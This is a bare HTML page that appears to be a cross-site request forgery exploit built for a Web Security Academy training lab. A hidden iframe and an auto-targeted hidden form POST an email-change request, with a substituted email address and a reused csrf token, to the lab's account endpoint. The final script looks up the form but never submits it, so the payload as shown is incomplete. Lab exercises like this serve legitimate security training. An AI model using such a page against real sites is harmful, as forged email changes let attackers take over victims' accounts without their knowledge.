<html>
    <body>
        <h1>Hello</h1>
        <iframe style="display:none" src="" frameborder="0" name="csrf-iframe"></iframe>
        <form action="https://0aef007404d2e12980c5032e00640068.web-security-academy.net/my-account?change-email" method="POST" id="csrf-form" target="csrf-iframe">
            <input type="hidden" name="email" value="fdjskfj@fhsd.com">
            <input type="hidden" name="csrf" value="RwDhVetU7NdkzXW6Ng8o3JBMC6A4K7gh">
        </form>

        <script>document.getElementById('csrf-form')</script>
    </body>
</html>